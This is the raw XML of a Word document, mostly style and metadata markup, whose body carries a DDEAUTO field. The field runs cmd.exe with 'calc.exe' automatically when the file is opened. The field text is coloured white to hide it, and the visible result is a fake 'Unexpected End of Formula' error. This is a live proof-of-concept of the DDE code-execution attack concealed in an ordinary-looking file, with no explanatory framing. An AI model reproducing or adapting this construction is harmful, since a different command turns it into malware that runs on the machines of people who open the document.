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084C" w14:textId="77B2F93C" w:rsidR="00EE425E" w:rsidRDefault="00EE425E">
      <w:pPr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DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" </w:instrText>
      </w:r>
      <w:r w:rsidR="00EC482B">
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E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40C0F" w14:textId="77777777" w:rsidR="00842DD7" w:rsidRDefault="00842DD7" w:rsidP="00EC482B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="15C3ABC6" w14:textId="77777777" w:rsidR="00842DD7" w:rsidRDefault="00842DD7" w:rsidP="00EC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B3A98" w14:textId="77777777" w:rsidR="00842DD7" w:rsidRDefault="00842DD7" w:rsidP="00EC482B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25709DDF" w14:textId="77777777" w:rsidR="00842DD7" w:rsidRDefault="00842DD7" w:rsidP="00EC4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425E"/>
    <w:rsid w:val="00211CE2"/>
    <w:rsid w:val="00842DD7"/>
    <w:rsid w:val="00D41A15"/>
    <w:rsid w:val="00EC482B"/>
    <w:rsid w:val="00E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0C46"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{230D943E-2005-4CF9-947C-876CD29F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DengXian" w:hAnsi="Aptos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5E"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5E"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25E"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25E"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25E"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25E"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25E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25E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"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25E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"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425E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EE425E"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EE425E"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EE425E"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EE425E"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EE425E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="DengXian Light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EE425E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="DengXian Light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EE425E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="DengXian Light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EE425E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="DengXian Light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EE425E"/>
    <w:pPr>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto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EE425E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25E"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="DengXian Light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EE425E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="DengXian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25E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EE425E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EE425E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00EE425E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25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EE425E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00EE425E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482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482B"/>
    <w:rPr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482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482B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Bryans</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Johnny Bryans</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-06T01:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-06T01:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>